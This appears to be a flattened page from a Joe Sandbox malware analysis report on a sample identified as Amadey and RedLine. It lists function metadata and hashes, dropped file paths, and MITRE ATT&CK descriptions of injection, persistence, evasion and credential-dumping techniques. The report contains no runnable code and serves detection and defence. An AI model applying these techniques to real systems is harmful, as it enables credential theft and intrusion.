Instruction Fuzzy Hash: 39317C22A18656C6E791AF1588C13BC2650BF60B90F45023DEA6D83BD2DFBCA941C713

Function 00007FF6845A8635 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6845A8663

Part of subcall function 00007FF6845A875C: GetModuleHandleExW.KERNEL32 ref: 00007FF6845A8781
Part of subcall function 00007FF6845A875C: GetProcAddress.KERNEL32 ref: 00007FF6845A8797
Part of subcall function 00007FF6845A875C: FreeLibrary.KERNEL32 ref: 00007FF6845A87BE

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction ID: cf0bf21c83e03530d0d29312e8cd8c1b67a1f9a80d3ba2c33b0b890a4e27f92e
Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction Fuzzy Hash: F6215A32A14A06C9EB64CF64E8802AC37B0FF5471CF580A3AD62D97AD5DF38D485CB91

Function 00007FF684588610 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6845886B3

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
Instruction ID: d783eeb4f0fd8dbea3a1dde25c507cb903eeae0165bcb6675f706529905a5143
Opcode Fuzzy Hash: e6349361f6599f48b43bc6f5e26d83757976fd9c1f62d7a7d6d28429aee037a6
Instruction Fuzzy Hash: E7117C22B5868292EA04DB16E19437E2362FF44B84F545439DB0D8BB86DF7DD9A0C381

Function 00007FF6845AC540 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6845AC594

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction ID: f993fa0e9d3ebb8f93f376a5e64f8aeb8dbf47ec6cd2f3f29e705c8d0fa8a669
Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction Fuzzy Hash: 2301C461A08742C4EB15DB5299800BDA794BF89FE0F084A39FE5CA7BD6CE3CE401C711

Function 00007FF6845887B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68459E3AC: FindClose.KERNEL32(?,?,?,?,00007FF684585182), ref: 00007FF68459E3B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684588816

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
Instruction ID: b5f442078f4246e699013a46e61e59316bd6ee60f7683d42c750d4c59184bb05
Opcode Fuzzy Hash: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
Instruction Fuzzy Hash: 730181A1B25586C1EF54DB6AD09537D2361FF44F88F54043ACA0C97A59DF2DE881C305

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

C:\Program Files\Windows Media Player\graph\graph.exe

C:\ProgramData\DBAEHCGHIIIDHIECFHJDHDGHDB

C:\ProgramData\DGCGDBGCAAEBFIECGHDGCAAEGD

C:\ProgramData\EGDBAFHJJDAKEBGCFCBG

C:\ProgramData\EHIJJDGDHDGDAKFIECFI

C:\ProgramData\GIJEGDAK

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre